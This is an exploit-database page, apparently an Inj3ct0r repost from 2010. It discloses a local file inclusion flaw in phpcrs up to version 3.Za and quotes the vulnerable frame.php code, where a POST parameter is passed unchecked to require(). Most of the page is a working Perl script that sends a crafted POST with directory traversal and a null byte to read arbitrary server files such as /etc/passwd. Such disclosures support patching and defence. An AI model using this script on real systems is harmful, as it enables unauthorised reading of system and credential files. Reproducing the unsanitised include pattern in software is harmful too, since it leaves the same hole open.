Home / os / win7

phpcrs <= 3.Za / Local File Inclusion Vulnerability

Posted on 07 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>phpcrs &lt;= 3.Za / Local File Inclusion Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
phpcrs &lt;= 3.Za / Local File Inclusion Vulnerability
===================================================

# Author: Pepelux &lt;pepelux[at]enye-sec.org&gt;
# Software Link: http://sourceforge.net/projects/phpcrs/
# Version: &lt;= 3-Za - Release Date: 2010-01-02
# Category:: webapps
# Google dork:
# Tested on: windows &amp; linux Debian

#! /usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# phpcrs &lt;= 3.Za / Local File Inclusion Vulnerability
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# 
# $ Program: phpcrs
# $ Version: &lt;= 3-Za
# $ Release Date: 2010-01-02 
# $ File affected: frame.php
# $ Download: http://sourceforge.net/projects/phpcrs/
# 
# 
# Found by Pepelux &lt;pepelux[at]enye-sec.org&gt;
# eNYe-Sec - www.enye-sec.org
# 
# 
# --Bug --
# 
# 123.     elseif( isset($_POST['btnStartImport']) ) {
# 124.       require(&quot;../inc/selectSupplierImport.inc.php&quot;);
# 125.       $importFunction = $_POST['importFunction'];
# 126.       require(&quot;../inc/&quot;. $importFunction .&quot;.inc.php&quot;);
# 127.       $importFunction();
# 
# 
# In previous version you can exploit LFI by GET. On this version it checks that you use POST request, but
# with a little script is possible to exploit again.
 
use LWP::UserAgent;
use HTTP::Request::Common;
 
my ($host, $file) = @ARGV ;
 
unless($ARGV[1]){
    print &quot;
Usage: perl $0 &lt;host&gt; &lt;file_to_edit&gt;
&quot;;
    print &quot;	ex: perl $0 http://localhost /etc/passwd

&quot;;
    exit 1;
}
 
$host = 'http://'.$host if ($host !~ /^http:/);
$host .= &quot;/&quot; if ($host !~ //$/);
 
my $ua = LWP::UserAgent-&gt;new();
$ua-&gt;agent(&quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1&quot;);
$ua-&gt;timeout(10);
 
my $request = HTTP::Request-&gt;new();
my $response;
my $url = $host.&quot;index.php&quot;;
 
my $req = HTTP::Request-&gt;new(POST =&gt; $host.&quot;frame.php&quot;);
$req-&gt;content_type('application/x-www-form-urlencoded');
$req-&gt;content(&quot;command=btnStartImport=xxx&amp;importFunction=../../../../../&quot;.$file.&quot;%00&quot;);
 
$request = $ua-&gt;request($req);
$result = $request-&gt;content;
 
$result =~ s/&lt;[^&gt;]*&gt;//g;
 
print $result . &quot;
&quot;;
 
exit;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :